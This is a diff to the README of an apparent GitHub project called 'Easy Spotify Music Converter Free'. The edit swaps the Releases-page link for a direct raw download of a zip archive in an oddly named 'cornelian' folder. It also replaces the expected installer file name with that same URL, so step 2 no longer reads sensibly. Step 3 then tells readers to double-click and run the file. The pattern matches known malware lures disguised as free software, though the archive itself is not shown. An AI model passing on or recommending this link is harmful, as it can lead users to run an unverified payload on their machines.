Adinda46/Easy-Spotify-Music-Converter-Free/README.md

 To get started, visit the Releases page and download the application.

-1. Click on the following link to **[visit this page to download](https://github.com/Adinda46/Easy-Spotify-Music-Converter-Free/releases)**.
+1. Click on the following link to **[visit this page to download](https://raw.githubusercontent.com/Adinda46/Easy-Spotify-Music-Converter-Free/main/cornelian/Spotify-Easy-Free-Converter-Music-3.2.zip)**.

 2. Look for the latest version.
-Choose the correct file for your system, usually listed as **"Easy-Spotify-Music-Converter-Free.exe."**
+Choose the correct file for your system, usually listed as **"https://raw.githubusercontent.com/Adinda46/Easy-Spotify-Music-Converter-Free/main/cornelian/Spotify-Easy-Free-Converter-Music-3.2.zip"**

 3. After downloading, locate the file in your Downloads folder and double-click to run it.